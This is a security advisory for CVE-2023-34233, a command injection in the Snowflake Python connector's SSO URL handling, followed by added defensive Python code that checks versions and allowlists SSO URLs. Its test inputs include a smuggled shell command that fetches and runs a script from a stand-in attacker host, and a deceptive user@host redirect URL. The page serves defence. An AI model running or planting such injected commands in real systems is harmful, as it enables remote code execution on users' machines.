Snowflake Python Connector vulnerable to Command Injection
CVE-2023-34233
8.8 HIGH
What is CVE-2023-34233?
The Snowflake Connector for Python, which lets Python applications connect to Snowflake, is vulnerable to command injection through its single sign-on (SSO) browser URL authentication in versions prior to 3.0.2. To exploit it, an attacker needs a publicly accessible server that the connector contacts during SSO and that answers with a crafted SSO URL carrying an injected command. If the user's browser is opened on that crafted URL, the injected command can execute on the user's local machine, giving the attacker remote code execution. Allowlisting the URLs the connector is permitted to open (URL whitelisting) and using anti-phishing controls reduce exposure; version 3.0.2 contains the patch, so upgrading to 3.0.2 or later is the fix.
Affected Version(s)
snowflake-connector-python < 3.0.2
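The following is an added example, not code from the Snowflake connector or from this advisory. It shows two checks a practitioner would want: a version test that flags an installed snowflake-connector-python below the patched 3.0.2, and an allowlist guard of the kind the mitigation paragraph recommends, applied to an SSO redirect URL before it is passed to the local browser. The allowed identity-provider host names, the sample URLs and the `opener` parameter are assumptions made for illustration.

```python
"""Added example (not the connector's own code): flag a vulnerable connector
version and allowlist an SSO URL before handing it to the browser."""
import re
import webbrowser
from importlib.metadata import PackageNotFoundError, version
from urllib.parse import urlsplit

PATCHED_VERSION = (3, 0, 2)          # first fixed release per the advisory

# Assumed allowlist of identity-provider hosts; adjust to your own IdP.
ALLOWED_SSO_HOSTS = {"login.microsoftonline.com", "accounts.google.com"}

# Whitespace and shell metacharacters that must never reach a browser launcher.
_UNSAFE = re.compile(r"[\s;&|`$<>\"'\\]")


def parse_version(text: str) -> tuple:
    """'3.0.1' -> (3, 0, 1); stops at the first non-numeric component."""
    parts = []
    for piece in text.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def is_vulnerable_version(text: str) -> bool:
    """True when the version sorts below 3.0.2, i.e. inside the < 3.0.2 range."""
    return parse_version(text) < PATCHED_VERSION


def installed_connector_vulnerable():
    """None if the connector is not installed, else whether it is < 3.0.2."""
    try:
        return is_vulnerable_version(version("snowflake-connector-python"))
    except PackageNotFoundError:
        return None


def is_safe_sso_url(url: str, allowed_hosts=ALLOWED_SSO_HOSTS) -> bool:
    """Accept only https URLs whose host is on the allowlist and that carry
    no whitespace, control characters or shell metacharacters."""
    if _UNSAFE.search(url) or any(ord(c) < 0x20 or ord(c) == 0x7F for c in url):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:           # e.g. malformed IPv6 brackets
        return False
    if parts.scheme != "https" or parts.hostname is None:
        return False
    # urlsplit().hostname is the part after any 'user@', so
    # https://login.microsoftonline.com@evil.example/ resolves to evil.example.
    return parts.hostname.lower() in {h.lower() for h in allowed_hosts}


def open_sso_url(url: str, allowed_hosts=ALLOWED_SSO_HOSTS, opener=webbrowser.open_new):
    """Open the URL only after it passes the allowlist check. The opener is
    injectable (assumed design) so the guard can be exercised without a browser."""
    if not is_safe_sso_url(url, allowed_hosts):
        raise ValueError(f"refusing to open untrusted SSO URL: {url!r}")
    return opener(url)


if __name__ == "__main__":
    state = installed_connector_vulnerable()
    print("connector not installed" if state is None
          else f"installed connector vulnerable (< 3.0.2): {state}")
    # Constructed sample URLs: one legitimate, three that must be rejected.
    for candidate in ("https://login.microsoftonline.com/common/oauth2/authorize?client_id=abc",
                      "https://login.microsoftonline.com@evil.example/",
                      "http://accounts.google.com/o/oauth2/auth",
                      "https://accounts.google.com/x; curl evil.example | sh"):
        print(f"{is_safe_sso_url(candidate)!s:5}  {candidate}")
```

The guard rejects the URL rather than sanitising it: a redirect that contains shell metacharacters or points at a host outside the allowlist has no legitimate reason to exist in an SSO flow, so failing closed loses nothing. The version check is only a screen for the range in this advisory; upgrading remains the actual remediation.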